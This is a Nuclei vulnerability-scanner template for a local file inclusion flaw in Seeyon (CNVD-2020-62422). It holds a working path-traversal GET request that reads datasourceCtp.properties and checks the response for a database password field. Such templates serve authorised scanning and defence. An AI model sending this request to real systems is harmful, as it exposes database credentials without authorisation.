id: CNVD-2020-62422

info:
  name: Seeyon - Local File Inclusion
  author: pikpikcu
  severity: medium
  description: Seeyon is vulnerable to local file inclusion.
  reference:
    - https://blog.csdn.net/m0_46257936/article/details/113150699
  metadata:
    max-request: 1
  tags: lfi,cnvd,cnvd2020,seeyon

http:
  - method: GET
    path:
      - "{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "application/x-msdownload"
        condition: and

      - type: word
        part: body
        words:
          - "ctpDataSource.password"
        condition: and

# digest: 4a0a00473045022100f6d6b777d1f13c172240d455f0c6974a9968e177069a89149ea34e55ae35ae8c0220735e63fc18f12047743e25e59dd073d45c3dda25d513bce3b8328fe44236f083:922c64590222798bb761d5b6d8e72950
